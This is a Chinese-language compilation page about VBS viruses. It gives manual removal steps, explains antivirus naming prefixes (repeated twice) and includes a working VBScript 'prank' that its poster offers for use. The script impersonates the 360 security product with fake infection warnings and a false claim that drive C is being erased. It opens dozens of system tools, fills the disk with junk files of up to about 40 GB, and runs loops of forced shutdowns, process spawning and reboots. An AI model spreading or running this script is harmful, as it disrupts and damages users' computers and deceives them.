本文目录一览：

• 1、怎么清除VBS病毒
• 2、Exploit.VBS.Phel.l是什么病毒
• 3、vbs整人代码
• 4、需要病毒名前缀大全
• 5、电脑中vbs病毒
• 6、virus.vbs.agent.u还有virus.vbs.agent.r是个什么病毒啊？

怎么清除VBS病毒

VBS病毒是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是一种思想，但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点：

编写简单、破坏力大、感染力强、传播范围广、变种多、欺骗性强；可以通过通过Email附件传播；通过局域网共享传播；通过感染htm、asp、jsp、php等网页文件传播；通过IRC聊天通道传播；

VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，中毒后的电脑会在各个盘符下面生成.vbs、autorun.exe等文件。下面笔者将一次手动成功清除VBS病毒的过程说一下，权当交流！

通过系统的资源管理器，可以看到一直有一个wscript.exe的进程存在，还有就是会感觉到机子很卡……

第一步：限制wscript.exe进程的运行。“开始——运行”，输入gpedit.msc，然后依次打开“计算机配置——Windows设置——安全设置——软件限制策略”，右键，选择“创建新策略”，选择“其他规则”，在右侧窗格空白处右击，在菜单中选择“新建路径规则”项，浏览选择C:\Windows\System32文件夹下的wscript.exe，将其安全级别设为“不允许”。这样我们就成功的限制了wscript.exe的运行。

第二步：通过任务管理器或者其他的工具，结束进程wscript.exe。

第三步：借助工具冰刃，删除各个盘符下面的.VBS、.vbe、js、autorun等文件。

第四步：搜索一下，在系统目录中是否还有.VBS、.vbe、js等文件存在，如果有，删除掉。在看看系统的启动项中有没有不明的启动项，如果有，也要删除掉！

第五步：重新启动电脑，看到各个盘符下面就没有.VBS等类型的文件了，系统也恢复到正常。

到这里，就已经成功的清除了VBS病毒！总结一下，重点是要限制VBS病毒的运行，只有先限制了它的运行，我们后面的删除工作才能正常的进.

Exploit.VBS.Phel.l是什么病毒

“费尔变种r（exploit.vbs.phel.r）”病毒：警惕程度，木马病毒，通过系统漏洞传播，依赖系统：win9x/nt/2000/xp。

病毒通过一封谎称麦克尔?杰克逊自杀的电子邮件进行传播，该邮件中存在一个利用windowshtml帮助文件漏洞的链接。如果用户的计算机没有安装相应的补丁程序，则用户点击该链接时就会被病毒感染。被病毒感染的计算机可被黑客远程控制，如运行程序、发送垃圾邮件等。

反病毒专家建议：建立良好的安全习惯，不打开可疑邮件和可疑网站；关闭或删除系统中不需要的服务；很多病毒利用漏洞传播，一定要及时给系统打补丁；安装专业的防毒软件进行实时监控，平时上网的时候一定要打开防病毒软件的实时监控功能。

ps：瑞星应该能清除此病毒

vbs整人代码

大量的楼上已经说了。这个是本人原创，亲测有用。毒性嘛，就是会烧CPU，然后在这个vbs旁边创建一大堆垃圾文件（请准备好30G空间）【具体在代码中】

仅供恶搞娱乐和研究，没有攻击任何人，组织的意图。

set qstart = wscript.CreateObject("wscript.shell")

set qweb = CreateObject("Wscript.Shell")

set qwrite = CreateObject("scripting.filesystemobject")

set qsay = CreateObject("sapi.spvoice")

qstart.run "D:\病毒BGM.mp3" ' 《江南皮革厂倒闭了.mp3》请准备好放在D:\

msgbox "您的电脑已被病毒入侵！",vbokonly+vbExclamation,"360 Defender"

qstart.run "cmd.exe /c start appwiz.cpl"

qstart.run "cmd.exe /c start bthprops.cpl"

qstart.run "cmd.exe /c start calc.exe"

qstart.run "cmd.exe /c start cleanmgr.exe"

qstart.run "cmd.exe /c start cmd.exe"

qstart.run "cmd.exe /c start colorcpl.exe"

qstart.run "cmd.exe /c start control.exe"

qstart.run "cmd.exe /c start cttune.exe"

qstart.run "cmd.exe /c start desk.cpl"

qstart.run "cmd.exe /c start dfrgui.exe"

qstart.run "cmd.exe /c start dxdiag.exe"

qstart.run "cmd.exe /c start FileHistory.exe"

qstart.run "cmd.exe /c start Firewall.cpl"

qstart.run "cmd.exe /c start Fondue.exe"

qstart.run "cmd.exe /c start fontview.exe"

qstart.run "cmd.exe /c start fsquirt.exe"

qstart.run "cmd.exe /c start hdwwiz.cpl"

qstart.run "cmd.exe /c start inetcpl.cpl"

qstart.run "cmd.exe /c start intl.cpl"

qstart.run "cmd.exe /c start irprops.cpl"

qstart.run "cmd.exe /c start joy.cpl"

qstart.run "cmd.exe /c start LaunchTM.exe"

qstart.run "cmd.exe /c start Magnify.exe"

qstart.run "cmd.exe /c start main.cpl"

qstart.run "cmd.exe /c start mblctr.exe"

qstart.run "cmd.exe /c start mmsys.cpl"

qstart.run "cmd.exe /c start msinfo32.exe"

qstart.run "cmd.exe /c start mspaint.exe"

qstart.run "cmd.exe /c start ncpa.cpl"

qstart.run "cmd.exe /c start notepad.exe"

qstart.run "cmd.exe /c start powercfg.cpl"

qstart.run "cmd.exe /c start RTSnMg64.cpl"

qstart.run "cmd.exe /c start SnippingTool.exe"

qstart.run "cmd.exe /c start sysdm.cpl"

qstart.run "cmd.exe /c start TabletPC.cpl"

qstart.run "cmd.exe /c start telephon.cpl"

qstart.run "cmd.exe /c start timedate.cpl"

qstart.run "cmd.exe /c start write.exe"

qstart.run "cmd.exe /c start wscript.exe"

qstart.run "cmd.exe /c start wscui.cpl"

qstart.run "cmd.exe /c fsutil file createnew 1.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 2.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 3.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 4.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 5.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 6.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 7.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 8.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 9.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 10.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 11.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 12.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 13.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 14.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 15.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 16.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 17.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 18.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 19.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 20.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 21.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 22.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 23.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 24.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 25.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 26.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 27.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 28.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 29.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 30.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 31.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 32.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 33.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 34.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 35.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 36.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 37.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 38.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 39.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 40.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 41.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 42.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 43.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 44.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 45.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 46.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 47.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 48.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 49.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 50.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 51.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 52.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 53.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 54.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 55.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 56.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 57.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 58.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 59.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 60.bug 40000"

qstart.run "cmd.exe /c fsutil file createnew 61.bug 400000"

qstart.run "cmd.exe /c fsutil file createnew 62.bug 4000000"

qstart.run "cmd.exe /c fsutil file createnew 63.bug 40000000"

qstart.run "cmd.exe /c fsutil file createnew 64.bug 400000000"

qstart.run "cmd.exe /c fsutil file createnew 65.bug 4000000000"

qstart.run "cmd.exe /c fsutil file createnew 666.bug 40000000000"

wscript.sleep 25000

qstart.run "cmd.exe /c shutdown -s -t 60 -c ""360公司温馨提醒：因为这个游戏涉及非法内容，所以您的电脑将在60秒后自动关机"" ",0,true

qstart.run "cmd.exe /c echo 滚|clip"

A = INPUTBOX ("说！360是不是上帝？"+chr(13)+chr(13)+chr(13)+"（“滚”已复制到剪贴板，可以粘贴。）","360 Defender","不是",8000,7000)

IF A = "是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "好的，现在您可以下载360安全卫士来杀毒了。",vbokonly,"360 Defender"

do

qweb.run""

loop

ELSEIF A = "不是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"您怎么这么懒呢？",vbokonly+vbQuestion,"360 Defender"

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"是时候锻炼锻炼了",vbokonly+vbInformation,"360 Defender"

msgbox "游戏规则：在开始后，请及时点击 “确定” 键来取消关机。"+chr(13)+"现在您可以把这个窗口x掉，或者点击确定，来开始游戏。",vbokonly+vbInformation,"360 Defender"

do

qstart.run "cmd.exe /c shutdown -s -t 5 ",0,true

msgbox "取消关机",vbokonly,"360 Defender"

qstart.run "cmd.exe /c shutdown -a",0,true

qweb.run""

qweb.run""

qweb.run""

loop

ELSEIF A = "" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "周鸿祎表示无语。"+chr(13)+chr(13)+chr(13)+"这样是不可能解决问题的",vbokonly,"360 Defender"

msgbox "自己探寻吧",vbokonly,"360 Defender"

do

qstart.run "cmd.exe /c shutdown -s -t 5",0,true

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd.exe /c shutdown -a",0,true

loop

ELSEIF A = "滚" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "emmmmmmmm",vbokonly,"360 Defender"

set qwriteb=qwrite.CreateTextFile( "D:\1.txt",,ture)

qwriteb.WriteLine "wscript.CreateObject(" chr(34) "wscript.shell" chr(34) ").run " chr(34) "D:\1.vbs" chr(34)

qwriteb.WriteLine "msgbox " chr(34) "滚" chr(34) ",vbokonly+vbinformation," chr(34) "360 Defender" chr(34)

qwriteb.close

qwrite.movefile "D:\1.txt","D:\1.vbs"

qstart.run "D:\1.vbs"

ELSE

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "由于您在说废话，但是您一定不想浪费时间说废话，所以该电脑对您有害。浪费别人时间就是谋财害命 ( 鲁迅 ) 。360积极维护您的财产权和生命健康权，决定不砸掉您的电脑。"+chr(13)+chr(13)+"那现在先把C盘给抹咯！",vbokonly+vbInformation,"360 Defender"

qsay.speak ("在抹掉C盘的过程中，您的电脑将会重启数次此瓷呲呲瓷此次次此瓷呲呲瓷此次次此瓷呲")

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qstart.run "cmd.exe /c shutdown -r -t 5",0,true

END IF

需要病毒名前缀大全

1、系统病毒

系统病毒的前缀为：Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的*.exe和 *.dll文件，并通过这些文件进行传播。如CIH病毒。

2、蠕虫病毒

蠕虫病毒的前缀是：Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波(阻塞网络)，小邮差(发带毒邮件)等。

3、木马病毒、黑客病毒

木马病毒其前缀是：Trojan，黑客病毒前缀名一般为Hack 。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息，而黑客病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的，即木马病毒负责侵入用户的电脑，而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马Trojan.QQ3344 ，还有大家可能遇见比较多的针对网络游戏的木马病毒如Trojan.LMir.PSW.60 。这里补充一点，病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如：网络枭雄(Hack.Nether.Client)等。

4、脚本病毒

脚本病毒的前缀是：。脚本病毒的公有特性是使用脚本语言编写，通过网页进行的传播的病毒，如红色代码(.Redlof)——可不是我们的老大代码兄哦"_"。脚本病毒还会有如下前缀：VBS、JS(表明是何种脚本编写的)，如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。

5、宏病毒

其实宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。宏病毒的前缀是：Macro，第二前缀是：Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀，格式是：Macro.Word97；凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀，格式是：Macro.Word；凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀，格式是：Macro.Excel97；凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀，格式是：Macro.Excel，依此类推。该类病毒的公有特性是能感染OFFICE系列文档，然后通过OFFICE通用模板进行传播，如：著名的美丽莎(Macro.Melissa)。

6、后门病毒

后门病毒的前缀是：Backdoor。该类病毒的公有特性是通过网络传播，给系统开后门，给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。

7、病毒种植程序病毒

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。如：冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。

8.破坏性程序病毒

破坏性程序病毒的前缀是：Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。如：格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。

9.玩笑病毒

玩笑病毒的前缀是：Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒并没有对用户电脑进行任何破坏。如：女鬼(Joke.Girlghost)病毒。

10.捆绑机病毒

捆绑机病毒的前缀是：Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来，表面上看是一个正常的文件，当用户运行这些捆绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQ(Binder.QQPass.QQBin)、系统杀手(Binder.killsys)等。

以上为比较常见的病毒前缀，有时候我们还会看到一些其他的，但比较少见，这里简单提一下：

DoS：会针对某台主机或者服务器进行DoS攻击；

Exploit：会自动通过溢出对方或者自己的系统漏洞来传播自身，或者他本身就是一个用于Hacking的溢出工具；

HackTool：黑客工具，也许本身并不破坏你的机子，但是会被别人加以利用来用你做替身去破坏别人。

电脑中vbs病毒

由于VBS病毒具有容易嵌入到网页等特点，因此越来越多的黑客采用这种方式传播木马病毒。中了VBS病毒会让你在Windows下看到“.VBS”文件，

系统进程中一直有wscript.exe进程存在，还有机器变慢等与其他病毒相同的现象。如果你遇到了这个情况，可以用下面的方法进行查杀。

第一步：先要禁止wscript.exe的运行。点击“开始→运行”，输入gpedit.msc。

第二步：在“组策略”窗格左侧，依次点击“计算机配置→Windows设置→安全设置→软件限制策略”项，然后点击“操作→创建新策略”菜单项。再从左侧选择“其他规则”。

第三步：在右侧窗格空白处右击，在菜单中选择“新建路径规则”项。在弹出的窗口中，点击“路径”后的“浏览”按钮，选择C:＼Windows＼System32文件夹下的wscript.exe文件，并将“安全级别”设置为“不允许的”

如果你有不想运行的文件，也可以在这里添加

第四步：将C:＼Windows下的System32、Dllcache和I386这两个文件夹下wscript.exe的扩展名去除，以防止病毒突破限制运行。注意，这期间会有Windows文件保护机制的报警，直接点击“取消→是”按钮即可。

第五步：在“任务管理器”中结束掉“wscript.exe”进程。

第六步：用IceSword等工具删除下面三个文件。

C:＼Windows＼.vbe

C:＼Windows＼System32＼.vbe

C:＼Documents and Settings＼All Users＼「开始」菜单＼程序＼启动＼.vbs

第七步：打开注册表编辑器，依次展开

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Policies＼Explorer＼Run

项，删除键。注意这里的“”是计算机名，电脑不同，名称也不同。

最后，恢复之前修改了文件名的wscript.exe文件即可。

这是第一种比较复杂的！！

还有一种简单点的，不严重：

点击　开始　运行　输入msconfig 启动里面　勾选杀毒软件，防火墙，输入法ctfmon三个其他的勾都去掉，应用，确定，关闭，重启(必须)。

再F8进安全模式，杀毒清理！

virus.vbs.agent.u还有virus.vbs.agent.r是个什么病毒啊？

这时脚本病毒。需要专杀的

很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor. RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名，这时有些人就懵了，那么长一串的名字，我怎么知道是什么病毒啊？

其实只要我们掌握一些病毒的命名规则，我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。

世界上那么多的病毒，反病毒公司为了方便管理，他们会按照病毒的特性，将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样，但大体都是采用一个统一的命名方法来命名的。

一般格式为：病毒前缀.病毒名.病毒后缀 。

病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的。不同的种类的病毒，其前缀也是不同的。比如我们常见的木马病毒的前缀 Trojan ，蠕虫病毒的前缀是 Worm 等等还有其他的。

病毒名是指一个病毒的家族特征，是用来区别和标识病毒家族的，如以前著名的CIH病毒的家族名都是统一的“ CIH ”，还有近期闹得正欢的振荡波蠕虫病毒的家族名是“ Sasser ”。

病毒后缀是指一个病毒的变种特征，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示，如Worm.Sasser.b就是指 振荡波蠕虫病毒的变种B，因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多（也表明该病毒生命力顽强 ^_^），可以采用数字与字母混合表示变种标识。

综上所述，一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型，就可以对这个病毒有个大概的评估（当然这需要积累一些常见病毒类型的相关知识，这不在本文讨论范围）。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。

下面附带一些常见的病毒前缀的解释（针对我们用得最多的Windows操作系统）：

1、系统病毒

系统病毒的前缀为：Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件，并通过这些文件进行传播。如CIH病毒。

2、蠕虫病毒

蠕虫病毒的前缀是：Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮差（发带毒邮件） 等。

3、木马病毒、黑客病毒

木马病毒其前缀是：Trojan，黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息，而黑客病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的，即木马病毒负责侵入用户的电脑，而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ，还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点，病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能（这些字母一般都为“密码”的英文“password”的缩写）一些黑客程序如：网络枭雄（Hack.Nether.Client）等。

4、脚本病毒

脚本病毒的前缀是：Script。脚本病毒的公有特性是使用脚本语言编写，通过网页进行的传播的病毒，如红色代码（Script.Redlof）——可不是我们的老大代码兄哦^_^。脚本病毒还会有如下前缀：VBS、JS（表明是何种脚本编写的），如欢乐时光（VBS.Happytime）、十四日（Js.Fortnight.c.s）等。

5、宏病毒

其实宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。宏病毒的前缀是：Macro，第二前缀是：Word、Word97、Excel、Excel97（也许还有别的）其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀，格式是：Macro.Word97；凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀，格式是：Macro.Word；凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀，格式是：Macro.Excel97；凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀，格式是：Macro.Excel，依此类推。该类病毒的公有特性是能感染OFFICE系列文档，然后通过OFFICE通用模板进行传播，如：著名的美丽莎(Macro.Melissa)。

6、后门病毒

后门病毒的前缀是：Backdoor。该类病毒的公有特性是通过网络传播，给系统开后门，给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。

7、病毒种植程序病毒

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。如：冰河播种者（Dropper.BingHe2.2C）、MSN射手(Dropper.Worm.Smibag)等。

8．破坏性程序病毒

破坏性程序病毒的前缀是：Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。如：格式化C盘（Harm.formatC.f）、杀手命令（Harm.Command.Killer）等。

9．玩笑病毒

玩笑病毒的前缀是：Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒并没有对用户电脑进行任何破坏。如：女鬼（Joke.Girlghost）病毒。

10．捆绑机病毒

捆绑机病毒的前缀是：Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来，表面上看是一个正常的文件，当用户运行这些捆绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQ（Binder.QQPass.QQBin）、系统杀手（Binder.killsys）等。以上为比较常见的病毒前缀，有时候我们还会看到一些其他的，但比较少见，这里简单提一下：

DoS：会针对某台主机或者服务器进行DoS攻击；

Exploit：会自动通过溢出对方或者自己的系统漏洞来传播自身，或者他本身就是一个用于Hacking的溢出工具；

HackTool：黑客工具，也许本身并不破坏你的机子，但是会被别人加以利用来用你做替身去破坏别人。